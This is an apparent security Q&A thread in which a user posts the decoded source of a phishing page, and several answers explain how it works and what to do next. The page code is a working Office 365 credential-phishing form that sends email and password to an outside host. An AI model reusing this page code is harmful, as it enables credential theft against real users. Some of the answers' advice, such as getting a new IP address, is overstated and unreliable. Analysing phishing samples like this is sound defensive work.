# Accidentally click a phishing link, is it dangerous?

Tags: phishing

not sure is this the correct place to ask a question like this.

I had accidentally clicked a link from my email, it bring me to a strange website that with a very long URL.

After Googling for some time, I found ways to convert it to a readable text, but I have no idea what it does, and how dangerous it is, are there any experience people here that can help me out?

```
<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Sign in to Office 365</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet">
<link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet">
<script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"></script>
<script src="http://thesimnews.com/box/owa/wwb10.min.js"></script>
<script>
$(document).ready(function()
{
   LoadValue('Editbox1', 'local', 0);
   LoadValue('Editbox2', 'local', 0);
   LoadValue('Checkbox1', 'local', 1);
   $("#Form1").submit(function(event)
   {
      StoreValue('Editbox1', 'local', 0);
      StoreValue('Editbox2', 'local', 0);
      StoreValue('Checkbox1', 'local', 1);
      return true;
   });
});
</script>
</head>
<body>
<div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;">
<img src="http://thesimnews.com/box/owa/images/Capture.PNG" id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;">
<span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;">Please login to continue upgrade</span></div>
<div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;">
<form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1">
<input type="hidden" name="formid" value="form1">
<input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="someone@example.com">
<input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;">
</form>
</div>
</body>
</html>'));
//-->
</script>
```

Comment: Can you please give us the url which sent you to this page ?

Comment: Its in an email that fake itself as Microsoft, it was in a image call update your account, when i right click and copy the link, it show this `http://bit.ly/2aw86ME`

Answer (score 0, accepted):

If the page only consists in this code and, it's ok. 
For what I see, this page only consists in a form. If you don't send your informations (email + password) through it, there is no risk.

I would be surprised if there was other attack vectors in this type of phishing page.

EDIT : 
For more informations about this, this "text" is the source code of the page. It contains a html form which can be (and is often) used on legit sites for login pages. 
To detect phishing attacks on pages like this one, you can use several factors: 
* The url (it begins with an IP, the website's name is bad written...)
* The source code : As you can see, it points to "http://[notMicrosoft].com/box/owa/result.php", which is not a microsoft site
* other factors (slow page, bad writing, bad image / page look...)

In a more general way, avoid clicking links in mails unless you are sure of its origin and, if it asks you to login, go on the site's main page (which you know is OK) and log yourself from there.

Comment: I see, thank you for the quick reply, luckily i didn't type in anything, cause the page was loading very slow, hence I became suspicious with it, and check the url bar, do I have to run a full scan on my pc as well just in case?

Comment: Running a full scan can't hurt

Comment: Hi, thank you for the additional information, now I know what those text are :)
I'll be careful the next time I receive a suspicious looking email.

Answer (score 0):

## Introduction:

> Accidentally click a phishing link, is it dangerous?

The pages themselves do not appear to contain malware (though some code is not viewable!), but it is a set of non-official pages mimicking official pages, so it is potentially dangerous to visit, or enter information into. **I would not suggest anyone visit the url**, even if for the purpose of answering this question, without taking precautions.

## Examination:

### Route:

> http://bit.ly/2aw86ME --> http://thesimnews.com/box/owa/adf.php --> data:text/html;base64,PHNjcml... [trimmed to avoid infringement] --> http://thesimnews.com/box/owa/result.php [302 Moved] --> http://thesimnews.com/box/owa/loading.php --> data:text/html;base64,PHNjcmlwdC.. [trimmed to avoid infringment] --> https://login.microsoftonline.com/

### Details:

bit.ly is a popular URL shortening service. thesimnews.com seems to be a news blog owned by Lucas Ulor (may not be his real name). Based on the IP address I believe it is hosted by Versaweb LLC. Site #3 has a long url, because it's actually not a url. It's a data uri (popular with attackers, but not evil in their own). The decoded data is javascript containing encrypted HTML data. The page mimicks an Office 365 login. Despite being a data uri, it draws several resources from thesimnews.com including pictures and javascripts.

[image: Screenshot]

Upon submitting the login form it uses POST to submit the user's email and password back to another page on thesimnews.com. This page is a php page, so I cannot say entirely what it does, because I only get to see the portions of code that it outputs to the visitor, but from what I can see it contains javascript code that redirects the user to another a data uri which contains javascript with encrypted HTML data. This page displays a congratulations message (this page also uses images and javascripts from thesimnews.com),

[image: Screenshot2]

and then redirects to an official Microsoft site.

## Conclusion:

This seems like an attempt to steal Office 365 login credentials. Good thing you didn't login :).

## Concequences:

- Your IP has been exposed to Lucas Ulor by visiting his site. In order for a hacker to attack you this is the first thing he/she needs to know (where you are).
- Your email address may also be exposed to Lucas Ulor because the bit.ly link emailed to you could be unique to you.

## Response:

### Suggested Actions:

- If you don't have a secure email password, get one.
- If you have an Office 365 account, use the same email for it, and don't have a secure Office 365 password, get one.
- If your email provider has a report function, report the email so that hopefully your email provider will block similar emails from being sent to other people, you hero you :).
- Watch for any unusual activity in your computer's firewall over the next while. In case of any hacking attempts on your computer.

If following these suggested actions, please keep in mind that I'm NOT a security expert, just a concerned passerby, procrastinating instead of doing what he should be.

### Additional Actions:

- Perform a full virus scan. The pages themselves were safe from what I could see (though not all code was exposed), but if you've been hacked since visiting, something malicious could be on your computer by now.
- Backup your data, so you are prepared in case of an attack.
- Get a new IP address. Most internet providers use dynamic IPs (changing) unless you pay extra for a static (permenant) one, so you may be able to get a fresh IP by disconnecting your modem for a while. Alternatively contact your internet provider and see if they will give you a fresh one.

## TL;DR

Seems like an attempt to steal Office 365 login details. **Your IP has been exposed**, and could be used to aid an attack on your system, so keep an eye out for unusual activity on your computer.